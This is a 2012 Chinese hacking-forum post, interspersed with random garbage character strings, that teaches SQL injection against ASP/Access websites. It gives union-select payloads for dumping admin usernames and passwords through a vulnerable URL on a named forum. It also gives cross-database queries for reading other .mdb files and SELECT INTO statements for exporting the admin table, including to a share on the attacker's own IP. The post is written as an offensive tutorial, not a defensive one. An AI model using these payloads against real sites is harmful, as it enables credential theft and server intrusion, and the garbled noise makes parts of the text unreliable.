--------------------------------------------------------------$ d# O; c* t( r+ K, ?
union查询法
" L( h. B; i1 M& P首先要说的就是查询办法,一般的查询办法就是
( k/ f( t) V# O* e5 B4 q# k
" x g8 U! [; B; c8 }+ A程序代码
+ i! A# e5 R& N3 p6 i0 gand 1=(select count(*) from admin where left(id,1)='1')/ q0 Z6 b/ m% R* i" E3 j
7 `3 x: a6 e# P p4 ^8 @
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
# q$ Q6 J! m8 k, H* g8 P. H所以这个时候,union select横空出现.别以为只能在PHP里用哦...
- l8 T( k) z" g, D- E4 h! c譬如你有一个ACCESS点:
7 B1 P. m9 A4 t8 {% n程序代码* i. M x, {2 d7 e q; D
http://bbs.tian6.com/xiaoyang.asp?coder=10 ~& X" }) w- o
* Q. c4 P+ P! T0 t
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
5 w, V* t" l* W% X% S5 B然后我们直接来:
& ^% ?3 E& m3 J程序代码
: B5 [$ t8 a) Shttp://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]
2 d4 h) ?! E* _6 `0 O2 D9 c6 y; X8 d! ^' z
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
' j# q% @& Q& ]& D3 X5 u) [5 Y
+ ~) {' a4 V3 X, G/ D+ i& W/ F( Q( \
6 v. [8 t- q R$ Y---------------------------------------------------------------
2 @* w$ m" l) E* MAccess跨库查询. i o' [& y& o) b: [
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
6 T% D% L! C6 v- ^2 k; d1 b跨库的查询语句:8 H( M& t5 Q \' S
子查询:$ K+ W* [- B% `
程序代码
# j/ N( H5 [7 V/ @$ yand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
7 j6 b1 X: ~; N
- W2 z+ }8 j/ H6 K$ y# }union查询:
, O b& w7 V% m# c程序代码; H$ f7 p3 E2 R1 O* n3 S4 f
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1# o3 }# x" L" Y% X6 x5 ] p
" E5 J* k9 _1 P, S2 n! P& F
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:, P5 X# \3 H* G! f. O+ g2 _8 c
程序代码 |, R% A h% {" C* f I0 J
http://www.4ngel.net/article/46.htm 5 i( Q1 s6 h+ Q* `8 z0 d# D
http://hf110.com/Article/hack/rqsl/200502/66.html
' E' [; k0 ?; |$ ] E# E- M4 [; n4 i$ W; f) v$ G3 j$ z' ]: |$ h
---------------------------------------------------------------
# X# |+ z" Z/ Q+ y. [8 g6 ~Access注入,导出txt,htm,html' S* l. m6 {- s. y+ [! [
子查询语句:
4 E2 m" T* f& r, \程序代码
. c Y$ N4 E3 B; I/ ^, g3 xSelect * into [test.txt] in 'd:\web\' 'text;' from admin4 E- o/ s, L" v. `, j% y( B$ o" ^3 |
3 ?3 A! s3 R3 d2 M
这样就把admin表的内容以test类型存进了d:\web里面.8 P0 c- K* b# X3 ]7 R9 C
UNION查询:
K& x# R; }8 r0 r9 ?6 t程序代码& }' k/ A: A/ c/ w
union select * into [admin.txt] in 'c:\' 'test;' from admin3 Q; ?5 m* }1 F
, j& W! I/ B0 a
而且这里也可以保存到本地来:
" c q7 N7 s, _1 G( c- F. k1 n2 S程序代码
% d( @, Z* R6 nSelect * into [test.txt] in '\\yourip\share' 'text;' from admin
, c+ m+ X6 ^( N: N& n
% q0 i' E& x5 l K7 G不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:! w2 M G" E/ H5 a; e" ~
" E; C* T. p2 l S* p: `程序代码, Z7 k) F2 H1 X7 J# p& `+ n( T5 B( g
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7, }2 P: G# K* f5 q1 v7 w+ c8 I
; g2 ~! k2 N8 ~$ O% S1 |- R因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang asp.asp之类的文件或者目录来导进文件~还是会很强大的.
- ]7 m' ]) j- Q, ?7 \ |
发表于 2012-9-15 14:20:57
收藏
支持
反对